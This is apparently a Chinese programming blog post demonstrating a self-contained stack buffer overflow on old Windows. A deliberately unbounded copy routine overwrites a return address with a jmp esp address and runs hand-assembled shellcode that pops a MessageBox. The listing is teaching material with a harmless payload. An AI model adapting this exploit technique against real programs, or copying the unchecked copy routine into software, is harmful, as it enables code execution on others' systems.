最简单的一个堆栈溢出攻击实例 (1) [by Progsoft]

最新推荐文章于 2022-03-30 16:46:40 发布
最新推荐文章于 2022-03-30 16:46:40 发布
阅读量2.4k 收藏 1
点赞数 1

以下列出一个简单的利用自身堆栈溢出漏洞,攻击自己的程序。

编译使用环境Windows2000/WindowsXP/VC6.0以下代码直接编译就可以产生简单攻击效果。

正常无溢出程序,弹出OK对话框,当然需要你将aucName数组0xFE结束符添加并不使其溢出。

溢出Debug版程序,弹出DBG HelloWorld!对话框,选择Debug编译即可。

溢出Release程序,弹出HelloWorld!对话框,选择Release编译即可。

代码详解,下回分解,^_^。

#include  " windows.h "
#define  UINT8 unsigned char

/**/ /* 该函数构造一个简单的溢出函数 */
void  GetName(UINT8  * pucSrcName, UINT8  * pucDstName)
 ... {
    while ((*pucSrcName) != 0xfe)
    ...{
        *pucDstName++ = *pucSrcName++;
    }
    *pucDstName = 0;
}

/**/ /* 在此函数中,调用后GetName弹出时,注入程序接管 */
void  ShowComputerName(UINT8  * pucName)
 ... {
    UINT8 pucComputerName[12];
    GetName(pucName,pucComputerName);
}

/**/ /* 仅为了提供MessageBox和ExitProcess地址,及jmp esp指令 */
void  ShowMessageBox( void )
 ... {
    MessageBox(0"OK""OK"0);
    ExitProcess(0);
    __asm jmp esp;
}

/**/ /* 模拟的异常串注入代码 */
UINT8 aucName[ 1024 ] =
... {
#ifdef _DEBUG
'D','B','G',' ',
'H','e','l','l',
'o','W','o','r',
'l','d','!',0x00,
/**//* Debug版 jmp esp地址 */
0x36,0x11,0x40,0x00,
/**//*
push   0
push   421A30h  Debug版本数组aucName的起始地址
push   421A30h  Debug版本数组aucName的起始地址
push   0
call   MessageBox
*/
0x6A,0x00,
0x68,0x30,0x1A,0x42,0x00,
0x68,0x30,0x1A,0x42,0x00,
0x6A,0x00,
0xFF,0x15,0x8C,0x52,0x42,0x00,
/**//*
push 0
call ExitProcess
*/
0x6A,0x00,
0xFF,0x15,0xDC,0x51,0x42,0x00,
/**//* 结束符号 */
0xFE
#else
'H','e','l','l',
'o','W','o','r',
'l','d','!',0x00,
/**//* Release版 jmp esp地址 */
0x72,0x10,0x40,0x00,  
/**//*
push   0
push   405030h  Release版本数组aucName的起始地址
push   405030h  Release版本数组aucName的起始地址
push   0
call   MessageBox
*/
0x6A,0x00,
0x68,0x30,0x50,0x40,0x00,
0x68,0x30,0x50,0x40,0x00,
0x6A,0x00,
0xFF,0x15,0x90,0x40,0x40,0x00,
/**//*
push 0
call ExitProcess
*/
0x6A,0x00,
0xFF,0x15,0x48,0x40,0x40,0x00,
/**//* 结束符号 */
0xFE 
#endif
} ;

 int  main( int  argc, UINT8  * argv[])
 ... {
    ShowComputerName(aucName);
    ShowMessageBox();
    return 0;
}

行走江湖
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
栈溢出攻击的一次简单尝试
Shreck66的专栏
03-10 3866
1.栈溢出的一个简单实例下面程序可能是那些接触C不久之后,可能会犯的一个数组越界导致缓冲区溢出的一个小例子#include <stdio.h> #include <unistd.h> #include <stdlib.h>void func(void) { int a = 23456; int b[2]; printf("b[2] = %d\n",b[2]); }in
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5561
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
EIP & EBP & ESP
f413933206的专栏
12-20 7038
eax, ebx, ecx, edx, esi, edi, ebp, esp等都是X86 汇编语言中CPU上的通用寄存器的名称,是32位的寄存器。如果用C语言来解释,可以把这些寄存器当作变量看待。比方说:add eax,-2 ;   //可以认为是给变量eax加上-2这样的一个值。这些32位寄存器有多种用途,但每一个都有“专长”,有各自的特别之处。EAX 是"累加器"(accumulator), 它是很多加法乘法指令的缺省寄存器。EBX 是"基地址"(base)寄存器, 在内存寻址时存放基地址。ECX 是计
Android 堆栈攻击之 ARM 栈分析 + ARM汇编解读
一只狍子的博客
05-18 898
想要劫持ARM 处理器,让它执行你想要的代码,从 ARM 栈攻击(Buffer overrun)入手,分析 ARM 栈溢出的原理,利用 ARM 汇编作为跳板指令,执行攻击程序。1. 栈 (Stack)介绍栈结构的文章网上很多,摘取一篇作为参考:http://hi.baidu.com/trical/item/585a24087f9b1a036c9048f0对ARM堆栈的理解      堆栈严格来说应...
[转] 简述堆栈溢出攻击
01-01 511
摘自: http://blog.csdn.net/chenlycly/article/details/37912755 预备知识: 从物理上讲,堆栈是就是一段连续分配的内存空间。在一个程序中,会声明各种变量。静态全局变量是位于数据段并且在程序开始运行的时候被加载。而程序的动态的局部变量则分配在堆栈里面。 从操作上来讲,堆栈一个先入后出的队列。他的生长方向与内存的生长方向正好相反。我们规...
堆栈溢出的解决方法
08-04
什么是栈溢出及解决方案。
一个不会出现堆栈溢出的快速排序算法
03-27
很多快速排序算法都采用递归算法,一旦数组过大,会出现堆栈溢出,我的算法采用循环法,避免堆栈溢出
基于Linux的堆栈溢出攻击和防御研究.pdf
09-06
基于Linux的堆栈溢出攻击和防御研究.pdf
MSP430F4xxx小RAM堆栈溢出
08-04
前几天一个大学同学在线问我他最近搞项目开发时遇到的一个问题,跟他聊了聊。他遇到的问题是程序里某个变量经常性的会被意外改变,造成数据混乱,所以产品一直无法出货。
堆栈溢出1
08-03
堆栈溢出1
层层惊心 堆栈攻击-OSI 网络安全防御
01-29
按OSI分层角度探讨网络安全,深入研究OSI堆栈,从物理层开始直到应用层。从分析每一层的漏洞出发,假想攻击这些漏洞的各种可能性,在此基础上讨论各个网络层次的安全防御手段。在讨论了所有的技术环节后,并没有忘记“人”对于网络的安全因素的影响,因此在OSI七层模型的基础上扩展了“人工层”。
栈1——栈攻击
huibin.yun的博客
12-30 689
越界溢出时。 比如变量放时,汇编是movl #0(-10)%rbp那么放就是从rbp-10的的地方,往上放的,而不是往下的,linux下栈是向下增长的。你取变量值的时候是地址++取的而不是–。1.变量被淹没比如flg变量,被memset其他变量的时候给覆盖,导致flg变量,导致程序流程改变。2.rbp被淹没和1一样,达到rbp,越它就会段错误。3.攻击,执行想要执行的程序思路:找到返回的栈地址,改成想要执行的代码。 ...
栈溢出攻击示例(shellcode打印/etc/passwd内容)
danxinzhujian的博客
12-02 375
参考:https://blog.csdn.net/omnispace/article/details/51005934 在实验之前,首先需要关闭操作系统的ASLR,否则每次内存地址都会发生变化。关闭ubuntu操作系统的ASLR需要以root权限执行命令(文件内容默认为2,且操作系统重启后自动恢复): echo 0 > /proc/sys/kernel/randomize_va_space 漏洞代码入下: #include <stdio.h> #include <stdl
重谈堆栈方向和栈溢出的利用(栈溢出攻击原理)
星空_MAX
03-30 2001
一般情况下,栈是从高地址向低地址增长,堆是从低地址向高地址增长 程序员习惯从低向高去读写内存,所以堆就是从低向高增长,而栈对此并不敏感,所以会有此内存布局
缓冲区溢出漏洞攻击——Shellcode编写
热门推荐
pianogirl123的博客
12-19 1万+
一、实验内容利用一个程序漏洞,编写shellcode,达成效果:蹦出对话框,显示“You have been hacked!(by JWM)”二、实验原理因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符覆盖了返回地址。如果覆盖的返回地址是一个有效地址,而在该地址处又有有效的指令,那么系统就会毫不犹豫地跳到该地址处去执行指令。本次实验中用到了跳板(jmp esp)由于操作系统每次
软件安全实验——栈溢出漏洞利用
Fng的博客
08-29 2383
已知目标主机(Microsoft Windows XP SP3)运行着CCProxy 6.2(演示版),且Microsoft Windows XP SP3内存0x7FFA4512处有一条JMP ESP指令,要求以"JMP ESP"为攻击跳板利用该栈溢出漏洞,攻击目标主机,在目标主机上创建一个用户(用户名为a)。
漏洞利用—栈溢出
谈成(C/C++)
04-28 418
下面的代码可以在xp sp3系统上运行测试: int vulnfun(char* str) { char stack[10]; strcpy(stack, str); return 0; } int main() { unsigned char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\
C/C++典型漏洞产生原理与Demo
Venscor技术养成之路
07-26 6084
本篇主要是自己学习笔记,快速读了下泉哥的《漏洞战争》的读书笔记。这里只涉及漏洞产生原理,即漏洞是怎么写出来。至于怎么分析0Day,怎么写代码执行的exp,后续将做深入研究。C/C++的代码执行漏洞,很多时候是劫持程序的控制流。具体来说:对于C程序,一般是控制函数的返回地址,让程序跳转到我们指定的地方执行。对于C++程序,除了覆盖函数返回地址外,还可以覆盖虚函数表,在调用虚函数的时候,程序将到指定内存
举例说明堆栈溢出攻击防范措施
最新发布
06-08
1. 使用编程语言提供的安全机制:一些高级编程语言,如Java和Python等,提供了自动内存管理的机制,可以有效地防止堆栈溢出攻击。 2. 输入验证:程序在接收用户输入时应该进行严格的验证,避免用户输入恶意代码。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值